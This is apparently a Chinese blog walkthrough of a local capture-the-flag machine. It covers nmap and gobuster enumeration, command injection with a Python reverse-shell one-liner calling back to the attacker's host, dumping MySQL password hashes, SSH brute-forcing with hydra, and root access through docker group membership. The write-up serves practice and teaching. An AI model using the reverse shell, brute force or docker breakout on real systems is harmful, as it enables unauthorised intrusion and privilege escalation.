Language

靶机说明

QQ群:660930334

主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/tmp]
└─# nmap -sn 192.168.2.0/24                                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-25 15:38 CST
Nmap scan report for 192.168.2.1
Host is up (0.00044s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00066s latency).
MAC Address: 08:00:27:56:1F:86 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.39
Host is up (0.00058s latency).
MAC Address: 08:00:27:B7:8E:39 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.12 seconds

IP地址:192.168.2.39

nmap扫描

1、全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[/tmp]
└─# nmap --min-rate 10000 -p- 192.168.2.39                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-25 15:39 CST
Nmap scan report for 192.168.2.39
Host is up (0.00029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9999/tcp open  abyss
MAC Address: 08:00:27:B7:8E:39 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 17.89 seconds

开放端口:22,80,9999

2、详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(root㉿kali)-[/tmp]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,9999 192.168.2.39
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-25 15:40 CST
Nmap scan report for 192.168.2.39
Host is up (0.0048s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesnt have a title (text/html).
9999/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-git: 
|   192.168.2.39:9999/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Remotes:
|_      https://github.com/zhuifengshaonianhanlu/pikachu.git
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Get the pikachu
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:B7:8E:39 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8, Linux 5.0 - 5.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.01 seconds

WEB渗透

1、80端口

curl80端口,没有发现任何东西

1
2
3
┌──(root㉿kali)-[/tmp]
└─# curl http://192.168.2.39     
index

1-目录爆破

尝试进行目录爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿kali)-[/tmp]
└─# gobuster dir -u http://192.168.2.39 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.39
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 6]
/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

也没有其他的目录,80端口基本上无任何东西

2、9999端口

访问9999端口,发现是一个pikachu的靶场

1-Getshell

直接RCE,尝试反弹shell

1
127.0.0.1 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

拿到shell权限

1
2
3
4
5
6
7
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.39] 42292
$ id
id
uid=1000(www-data) gid=50(staff) groups=50(staff)

2-尝试docker逃逸

查看/,发现存在.dockerenv,故判定进入的是一个docker容器,需尝试docker逃逸,但经过尝试无法逃逸成功。

Mysql渗透

查看文件,找到数据库的用户名和密码以及数据库名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
www-data@b0dd1db70539:/app/inc$ ls
config.inc.php  function.php  mysql.inc.php  showvcode.php  uploadfunction.php
www-data@b0dd1db70539:/app/inc$ cat config.inc.php 
<?php
//全局session_start
session_start();
//全局居设置时区
date_default_timezone_set('Asia/Shanghai');
//全局设置默认字符
header('Content-type:text/html;charset=utf-8');
//定义数据库连接参数
define('DBHOST', '127.0.0.1');//将localhost或者127.0.0.1修改为数据库服务器的地址
define('DBUSER', 'root');//将root修改为连接mysql的用户名
define('DBPW', '');//将root修改为连接mysql的密码,如果改了还是连接不上,请先手动连接下你的数据库,确保数据库服务没问题在说!
define('DBNAME', 'pikachu');//自定义,建议不修改
define('DBPORT', '3306');//将3306修改为mysql的连接端口,默认tcp3306
?>

1、连接数据库

由于数据库不需要密码,直接回车即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
www-data@b0dd1db70539:/app/inc$ mysql -uroot -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.7.26-0ubuntu0.18.04.1-log (Ubuntu)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

2、查看数据库数据

进入pikachu数据库,查看user表,找到一个用户ml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
mysql> use pikachu
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-------------------+
| Tables_in_pikachu |
+-------------------+
| httpinfo          |
| member            |
| message           |
| users             |
| xssblind          |
+-------------------+
5 rows in set (0.01 sec)

mysql> select * from users;
+----+----------+----------------------------------+-------+
| id | username | password                         | level |
+----+----------+----------------------------------+-------+
|  1 | admin    | e10adc3949ba59abbe56e057f20f883e |     1 |
|  2 | pikachu  | 670b14728ad9902aecba32e22fa4f6bd |     2 |
|  3 | test     | e99a18c428cb38d5f260853678922e03 |     3 |
|  4 | ml       | I heard you like explosives      |     4 |
+----+----------+----------------------------------+-------+
4 rows in set (0.00 sec)

password显示I heard you like explosives,提示我们需要进行爆破

SSH密码爆破

根据在users表里面查看到的提示,尝试进行爆破
同时在/tmp目录下面找到一个hint.txt,提示密码也需是由用户名组成

1
2
www-data@b0dd1db70539:/app/inc$ cat /tmp/hint.txt 
Maybe passwords are all made up of usernames

1、构造字典

查找rockyou字典里面包含ml的字典

1
2
┌──(root㉿kali)-[/tmp]
└─# cat /usr/share/wordlists/rockyou.txt | grep '^ml' > ml.txt

2、hydra爆破

hydra -l ml -P ml.txt ssh://192.168.2.39 -vV
成功找到密码mlmlml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(root㉿kali)-[/tmp]
└─# hydra -l ml -P ml.txt ssh://192.168.2.39 -vV 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-26 09:42:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 5819 login tries (l:1/p:5819), ~364 tries per task
[DATA] attacking ssh://192.168.2.39:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://ml@192.168.2.39:22
[INFO] Successful, password authentication is supported by ssh://192.168.2.39:22
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "mlb123" - 1 of 5819 [child 0] (0/0)
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "mlmlml" - 2 of 5819 [child 1] (0/0)
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "mladen" - 3 of 5819 [child 2] (0/0)
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "mlover" - 4 of 5819 [child 3] (0/0)
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "mlm123" - 5 of 5819 [child 4] (0/0)
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "mlking" - 6 of 5819 [child 5] (0/0)
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "mlc123" - 7 of 5819 [child 6] (0/0)
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "ml1234" - 8 of 5819 [child 7] (0/0)
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "mlp123" - 9 of 5819 [child 8] (0/0)
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "mlovem" - 10 of 5819 [child 9] (0/0)
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "mlkmlk" - 11 of 5819 [child 10] (0/0)
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "mlovesj" - 12 of 5819 [child 11] (0/0)
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "mlopez" - 13 of 5819 [child 12] (0/0)
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "mlmmlm" - 14 of 5819 [child 13] (0/0)
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "mleigh" - 15 of 5819 [child 14] (0/0)
[ATTEMPT] target 192.168.2.39 - login "ml" - pass "mluisa" - 16 of 5819 [child 15] (0/0)
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Disabled child 8 because of too many errors
[VERBOSE] Disabled child 12 because of too many errors
[VERBOSE] Disabled child 14 because of too many errors
[22][ssh] host: 192.168.2.39   login: ml   password: mlmlml
[STATUS] attack finished for 192.168.2.39 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-26 09:42:19

USER FLAG
根据爆破出来的用户名ml和密码mlmlml,进行ssh登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/tmp]
└─# ssh ml@192.168.2.39                   
ml@192.168.2.39 is password: 
Linux language 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
ml@language:~$ ls
user.txt
ml@language:~$ cat user.txt 
flag{this-is-user-flag!!!}

提权-Docker逃逸

使用sudo -l进行查看,发现需要密码

1
2
3
4
5
6
7
8
9
ml@language:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.
[sudo] password for ml:

查看用户id,发现用户名ml属于docker组

1
2
ml@language:~$ id
uid=1001(ml) gid=1001(ml) groups=1001(ml),113(docker)

Docker守护进程允许docker用户组的成员和root用户访问Docker。 当前用户如果属于这个组,就可以使用Docker命令尝试提权。

拉取镜像启动一个新的容器,以sh或者/bin/bash作为shell启动,并将宿主机的/目录挂载到容器的/mnt目录下

1
2
3
4
5
6
ml@language:/tmp$ docker ps
CONTAINER ID   IMAGE            COMMAND     CREATED      STATUS             PORTS                            NAMES
b0dd1db70539   area39/pikachu   "/run.sh"   2 days ago   Up About an hour   3306/tcp, 0.0.0.0:9999->80/tcp   pikachu
ml@language:/tmp$ docker run -v /:/mnt --rm -it area39/pikachu chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root)

ROOT FLAG

1
2
# cat /root/root.txt
flag{this-is-root-flag!!!}

【总结】

1、Docker逃逸

相关文章:Docker 介绍 | T Wiki

2、Mysql常用命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#连接数据库
mysql -h$IP -uroot -p$passwd -P3306

#查库
show databases; - 列出所有数据库

#选择/切换数据库
use database_name; - 进入指定数据库
select database(); - 查看当前所在数据库

#查表
show tables; - 当前库的所有表
show tables from db_name; - 查看其他库的表

#查字段
select * from table_name;
show columns from table_name
Maze-sec
#mysql #hydra #提权-docker逃逸
Language
http://miao-sec.github.io/Maze-sec/Language/
作者
Miao
发布于
2025年6月26日
许可协议
BY-MIAO